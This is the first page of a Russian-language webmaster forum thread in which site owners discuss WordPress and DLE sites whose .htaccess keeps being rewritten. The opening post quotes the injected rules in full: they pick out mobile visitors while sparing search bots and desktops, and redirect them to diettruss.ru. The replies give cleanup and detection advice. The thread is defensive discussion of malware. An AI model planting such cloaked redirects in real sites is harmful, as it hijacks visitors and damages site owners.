Взламывают htaccess в WP

(Ответов: 24, Просмотров: 3349)
Страница 1 из 3 123 Последняя
  1. Дипломник Аватар для stickman
    • Регистрация: 19.01.2011
    • Сообщений: 128
    • Репутация: 41
    • Webmoney BL: ?
    Постоянно ломают сайты на ВордПрессе и ДЛЕ. Дописывают редиректы для мобил в htaccess. Кто сталкивался, как бороться? Заколебался уже чистить каждый день.
    PHP код:
    RewriteEngine on
    RewriteCond 
    %{HTTP_USER_AGENTacs [NC,OR]
    RewriteCond %{HTTP_USER_AGENTalav [NC,OR]
    RewriteCond %{HTTP_USER_AGENTalca [NC,OR]
    RewriteCond %{HTTP_USER_AGENTamoi [NC,OR]
    RewriteCond %{HTTP_USER_AGENTaudi [NC,OR]
    RewriteCond %{HTTP_USER_AGENTaste [NC,OR]
    RewriteCond %{HTTP_USER_AGENTavan [NC,OR]
    RewriteCond %{HTTP_USER_AGENTbenq [NC,OR]
    RewriteCond %{HTTP_USER_AGENTbird [NC,OR]
    RewriteCond %{HTTP_USER_AGENTblac [NC,OR]
    RewriteCond %{HTTP_USER_AGENTblaz [NC,OR]
    RewriteCond %{HTTP_USER_AGENTbrew [NC,OR]
    RewriteCond %{HTTP_USER_AGENTcell [NC,OR]
    RewriteCond %{HTTP_USER_AGENTcldc [NC,OR]
    RewriteCond %{HTTP_USER_AGENTcmd- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTdang [NC,OR]
    RewriteCond %{HTTP_USER_AGENTdoco [NC,OR]
    RewriteCond %{HTTP_USER_AGENTeric [NC,OR]
    RewriteCond %{HTTP_USER_AGENThipt [NC,OR]
    RewriteCond %{HTTP_USER_AGENTinno [NC,OR]
    RewriteCond %{HTTP_USER_AGENTipaq [NC,OR]
    RewriteCond %{HTTP_USER_AGENTjava [NC,OR]
    RewriteCond %{HTTP_USER_AGENTjigs [NC,OR]
    RewriteCond %{HTTP_USER_AGENTkddi [NC,OR]
    RewriteCond %{HTTP_USER_AGENTkeji [NC,OR]
    RewriteCond %{HTTP_USER_AGENTleno [NC,OR]
    RewriteCond %{HTTP_USER_AGENTlg-[NC,OR]
    RewriteCond %{HTTP_USER_AGENTlg-[NC,OR]
    RewriteCond %{HTTP_USER_AGENTlg-[NC,OR]
    RewriteCond %{HTTP_USER_AGENTlge- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmaui [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmaxo [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmidp [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmits [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmmef [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmobi [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmot- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmoto [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmwbp [NC,OR]
    RewriteCond %{HTTP_USER_AGENTnec- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTnewt [NC,OR]
    RewriteCond %{HTTP_USER_AGENTnoki [NC,OR]
    RewriteCond %{HTTP_USER_AGENTopwv [NC,OR]
    RewriteCond %{HTTP_USER_AGENTpalm [NC,OR]
    RewriteCond %{HTTP_USER_AGENTpana [NC,OR]
    RewriteCond %{HTTP_USER_AGENTpant [NC,OR]
    RewriteCond %{HTTP_USER_AGENTpdxg [NC,OR]
    RewriteCond %{HTTP_USER_AGENTphil [NC,OR]
    RewriteCond %{HTTP_USER_AGENTplay [NC,OR]
    RewriteCond %{HTTP_USER_AGENTpluc [NC,OR]
    RewriteCond %{HTTP_USER_AGENTport [NC,OR]
    RewriteCond %{HTTP_USER_AGENTprox [NC,OR]
    RewriteCond %{HTTP_USER_AGENTqtek [NC,OR]
    RewriteCond %{HTTP_USER_AGENTqwap [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsage [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsams [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsany [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsch- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsec- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsend [NC,OR]
    RewriteCond %{HTTP_USER_AGENTseri [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsgh- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTshar [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsie- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsiem [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsmal [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsmar [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsony [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsph- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsymb [NC,OR]
    RewriteCond %{HTTP_USER_AGENTt-mo [NC,OR]
    RewriteCond %{HTTP_USER_AGENTteli [NC,OR]
    RewriteCond %{HTTP_USER_AGENTtim- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTtosh [NC,OR]
    RewriteCond %{HTTP_USER_AGENTtsm- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTupg1 [NC,OR]
    RewriteCond %{HTTP_USER_AGENTupsi [NC,OR]
    RewriteCond %{HTTP_USER_AGENTvk-[NC,OR]
    RewriteCond %{HTTP_USER_AGENTvoda [NC,OR]
    RewriteCond %{HTTP_USER_AGENTw3cs [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwap- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwapa [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwapi [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwapp [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwapr [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwebc [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwinw [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwinw [NC,OR]
    RewriteCond %{HTTP_USER_AGENTxda [NC,OR]
    RewriteCond %{HTTP_USER_AGENTxda- [NC,OR]
    RewriteCond %{HTTP_USER_AGENTup.browser [NC,OR]
    RewriteCond %{HTTP_USER_AGENTup.link [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwindows.ce [NC,OR]
    RewriteCond %{HTTP_USER_AGENTiemobile [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmini [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmmp [NC,OR]
    RewriteCond %{HTTP_USER_AGENTsymbian [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmidp [NC,OR]
    RewriteCond %{HTTP_USER_AGENTwap [NC,OR]
    RewriteCond %{HTTP_USER_AGENTphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENTipad [NC,OR]
    RewriteCond %{HTTP_USER_AGENTiphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENTiPad [NC,OR]
    RewriteCond %{HTTP_USER_AGENTiPhone [NC,OR]
    RewriteCond %{HTTP_USER_AGENTipod [NC,OR]
    RewriteCond %{HTTP_USER_AGENTiPod [NC,OR]
    RewriteCond %{HTTP_USER_AGENTpocket [NC,OR]
    RewriteCond %{HTTP_USER_AGENTmobile [NC,OR]
    RewriteCond %{HTTP_USER_AGENTandroid [NC,OR]
    RewriteCond %{HTTP_USER_AGENTAndroid [NC,OR]
    RewriteCond %{HTTP_USER_AGENTpda [NC,OR]
    RewriteCond %{HTTP_USER_AGENTPPC [NC,OR]
    RewriteCond %{HTTP_USER_AGENTSeries60 [NC,OR]
    RewriteCond %{HTTP_USER_AGENTOpera.Mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENTMoby [NC,OR]
    RewriteCond %{HTTP_USER_AGENTMobi [NC,OR]
    RewriteCond %{HTTP_ACCEPT"text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
    RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
    RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
    RewriteCond %{HTTP_USER_AGENT} !unix [NC]
    RewriteCond %{HTTP_USER_AGENT} !macos [NC]
    RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
    RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
    RewriteCond %{HTTP_USER_AGENT} !google [NC]
    RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
    RewriteCond %{HTTP_USER_AGENT} !bot [NC]
    RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
    RewriteCond %{HTTP_USER_AGENT} !msn [NC]
    RewriteCond %{HTTP_USER_AGENT} !america [NC]
    RewriteCond %{HTTP_USER_AGENT} !avant [NC]
    RewriteCond %{HTTP_USER_AGENT} !download [NC]
    RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
    RewriteCond %{HTTP_USER_AGENT} !maui [NC]
    RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
    RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
    RewriteRule ^(.*)$ http://diettruss.ru/ [L,R=302] 
    • -1
  2. WP-R.ru - магазин WP Аватар для mojwp
    • Регистрация: 13.09.2011
    • Сообщений: 841
    • Репутация: 290
    • Webmoney BL: ?
    такое в начале 2012 года было массово. Ломали всех подряд. Хостер прикрыл со временем дыру.
    У вас файлы php скорее всего содержат код левый. Выкачайте на hdd и проверьте все.
    • 0
  3. SEO специалист Аватар для hammer8
    • Регистрация: 14.05.2012
    • Сообщений: 2,824
    • Репутация: 531
    • Webmoney BL: ?
    stickman, У вас не взламывают конкретно htaccess. А у вас есть вредоновсный код, вероятно в индексных файлах движка, шаблонов и плагинов. Он заново и заново вписывают эту хрень. Для того что бы определить то это или нет. Просто удалите всю гадость с htaccess потом перейдите на сайт с поиска один раз, должно перейти без перенаправлений. А вот повторный, уже с ридеректом на вредоносный сайт. Дальше вам нужно будет заказать(обычно это делают бесплатно) у хостера проверку сайта на вирусы, найти список уязвимых для заражения файлов, найти зараженные файлы самому. Код должен выглядеть "decodebase64 и куча непонятных символов", в любом случае что-то похожее, обычно прямо вначале кода, не похож на шелы, которые вписывают более хитро, когда человек которые знает Php на базовом уровне понять не может.
    • 3

    Спасибо сказали:

    Docadept(11.05.2013), stickman(11.05.2013), Левша(11.05.2013),
  4. Гуру Аватар для akrustam
    • Регистрация: 21.05.2010
    • Сообщений: 1,161
    • Репутация: 285
    • Webmoney BL: ?
    Ой. Как меня за долбало чистить и искать шеллы.
    • 0
  5. Дипломник
    • Регистрация: 09.12.2012
    • Сообщений: 219
    • Репутация: 84
    akrustam, так ищите дыру, через которую шеллы попадают к Вам на сайт.
    • 0
  6. SEO специалист Аватар для hammer8
    • Регистрация: 14.05.2012
    • Сообщений: 2,824
    • Репутация: 531
    • Webmoney BL: ?
    Цитата Сообщение от Ailton Посмотреть сообщение
    так ищите дыру, через которую шеллы попадают к Вам на сайт.
    Легко сказать- сложно сделать. Зачастую это не зависит от самого сайта, и к тому же сложно обвинять в этом хостера. Рациональнее закрыть от редактирования файлы, как уже отписывалось на это форуме.
    • 0
  7. Дипломник
    • Регистрация: 09.12.2012
    • Сообщений: 219
    • Репутация: 84
    hammer8, закрыть файлы, конечно, можно (Вы имеете в виду способ с файлом ftpaccess?), но это далеко не панацея. Проверял на собственном опыте - ломают точно так же (двиг - ДЛЕ).
    Тут, скорее, нужно смотреть в код установленных модов - возможно в них и есть уязвимость. Также не помешает заглянуть в логи и попытаться выяснить, как именно происходит заражение.
    • 0
  8. Опытный Аватар для mmi
    • Регистрация: 02.05.2012
    • Сообщений: 332
    • Репутация: 64
    Уязвимость в последних нескольких версиях вордпресов, нашел на хакерском сайте пошаговый мануал по взлому сайта и получению админки или вноса кода в файлы без получения админки. Все очень просто, дыра реально не поправимая. В коментах набивается определенный код, если стоит капча, ее можно даже не распознавать и не вводить.
    Хакеры смеются, что разработчик закрывая маленькую щель, открыл в другом месте большой тоннель.
    Мне раз в неделю на одном сайте закидывают либо шел, либо юзера-клиента, а потом меняют ему права на админа, либо засаживают мне на сайт сенд-мейл.
    Но то, что пишет ТС, это уже после, когда на сайте или на соседнем сайте на хостинге сидит шел.
    • 0
  9. Дипломник Аватар для stickman
    • Регистрация: 19.01.2011
    • Сообщений: 128
    • Репутация: 41
    • Webmoney BL: ?
    Действительно хрень какаято. Сейчас посмотрел, еще на одном домене где вообще не стоит движок - тоже залит htaccess с редиректами. Беда...

    ---------- Сообщение добавлено 03:40 ---------- Предыдущее 03:39 ----------

    не было раньше таких проблем (кажется), пока к webhost1 не переехал =/

    ---------- Сообщение добавлено 03:49 ---------- Предыдущее 03:40 ----------

    Взгляните плиз, что тут может быть не так?
    Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):
    У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.
    • 0
  10. Дипломник
    • Регистрация: 19.08.2010
    • Сообщений: 154
    • Репутация: 31
    • Webmoney BL: ?
    stickman, с этой бедой боролся новой переинсталляцией движков на другом чистом хостинге и дизайн переносил вручную. То есть, снова все верстал по-новому, используя со старого диза только картинки, код писал заново. Это кара для тех, кто не делает вовремя бекапы.
    • 1

    Спасибо сказали:

    altezzik(11.05.2013),
Страница 1 из 3 123 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
[help] .htaccess
DLE 4 23.03.2013 13:34
.htaccess DLE
DLE 1 21.02.2013 17:58
.htaccess
Хостинг и Серверы 11 13.02.2013 19:23
htaccess.ru – правильная настройка файла .htaccess
Оценка ваших сайтов, блогов 4 23.01.2013 11:07
Внимание взламывают сайты
Оффтоп и свободные темы 20 20.06.2010 17:32

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры